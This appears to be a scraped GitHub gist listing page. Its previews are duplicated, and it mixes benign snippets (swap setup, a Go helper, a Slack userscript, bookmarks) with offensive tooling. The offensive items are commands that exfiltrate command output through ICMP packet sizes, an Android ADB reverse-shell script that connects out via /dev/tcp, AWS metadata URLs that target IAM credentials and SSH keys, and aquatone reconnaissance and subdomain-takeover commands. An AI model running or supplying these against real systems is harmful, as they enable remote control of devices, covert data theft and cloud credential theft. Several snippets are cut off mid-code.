OK omarkurt

## icmp.md

      
              1 file
            
          
              2 forks
            
          
              1 comment
            
          
              26 stars
            
          
                jobertabma
                / icmp.md
            
            
              Last active
              September 14, 2022 15:02
            
              
                Commands to exfiltrate command output via ICMP packet size
              
          
Capture ICMP packets on your server:

tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap


Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:

ip=vm03;output=`hostname`;for ((i=0;i&lt;${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done


## aq.sh
#!/bin/bash
aquatone-discover -d $1 --threads 10
aquatone-scan -d $1 --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
aquatone-takeover -d $1 --threads 10

## swap.sh
#!/bin/bash
echo "[*] Swap Setup for VPS with 512mb... [*]"
swapon -s
dd if=/dev/zero of=/swapfile bs=1024 count=2048k
mkswap /swapfile
swapon /swapfile
echo 10 | sudo tee /proc/sys/vm/swappiness
echo vm.swappiness = 10 | sudo tee -a /etc/sysctl.conf
chown root:root /swapfile
chmod 0600 /swapfile

## delete-twitter-dm.js
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
    if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
        clearInterval(tmr)
        return;
    }

    dm.firstChild.click();
    setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);

## slice_exists.go
package main

import(
	"fmt"
	"reflect"
)

func main() {
	items := []int{1,2,3,4,5,6}
	fmt.Println(SliceExists(items, 5)) // returns true

## Colorized Slack.user.js
// ==UserScript==
// @name         Colorized Slack
// @namespace    https://www.netsparker.com/
// @version      1.4.1
// @description  Colorizes the message threads.
// @author       Hakan Arıcı
// @include        *.slack.com*
// ==/UserScript==

(function() {

## bookmarks.html
https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c

https://www.cidrcalculator.com/asn/asn-to-prefix.html?lang=en

https://itnext.io/aks-kubernetes-security-walk-through-challenge-2-dbe3ed16beec

https://www.digitalinterruption.com/single-post/2018/06/04/Are-Your-Cookies-Telling-Your-Fortune

https://blog.innerht.ml/

## screenshot.sh
#!/bin/bash
chromium-browser --headless --disable-gpu  --window-size=1920,1080 --screenshot http://$1 --screenshot=$RANDOM.jpg >/dev/null 2>&1
echo "[*] Screenshot Taken of http://$1 [*]"

## android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"

## cloud_metadata.txt
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	#!/bin/bash
	aquatone-discover -d $1 --threads 10
	aquatone-scan -d $1 --ports huge --threads 10
	DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
	aquatone-takeover -d $1 --threads 10
	#!/bin/bash
	echo "[] Swap Setup for VPS with 512mb... []"
	swapon -s
	dd if=/dev/zero of=/swapfile bs=1024 count=2048k
	mkswap /swapfile
	swapon /swapfile
	echo 10 \| sudo tee /proc/sys/vm/swappiness
	echo vm.swappiness = 10 \| sudo tee -a /etc/sysctl.conf
	chown root:root /swapfile
	chmod 0600 /swapfile
	package main

	import(
	"fmt"
	"reflect"
	)

	func main() {
	items := []int{1,2,3,4,5,6}
	fmt.Println(SliceExists(items, 5)) // returns true
	// ==UserScript==
	// @name Colorized Slack
	// @namespace https://www.netsparker.com/
	// @version 1.4.1
	// @description Colorizes the message threads.
	// @author Hakan Arıcı
	// @include .slack.com
	// ==/UserScript==

	(function() {
	https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c

	https://www.cidrcalculator.com/asn/asn-to-prefix.html?lang=en

	https://itnext.io/aks-kubernetes-security-walk-through-challenge-2-dbe3ed16beec

	https://www.digitalinterruption.com/single-post/2018/06/04/Are-Your-Cookies-Telling-Your-Fortune

	https://blog.innerht.ml/
	#!/bin/bash
	chromium-browser --headless --disable-gpu --window-size=1920,1080 --screenshot http://$1 --screenshot=$RANDOM.jpg >/dev/null 2>&1
	echo "[] Screenshot Taken of http://$1 []"
	#!/bin/bash
	# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
	# By Random_Robbie
	adb connect $1:5555
	adb shell sh -i >& /dev/tcp/$2/4444 0>&1
	echo "[] Should have a shell now ..... Be nice :) []"
	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key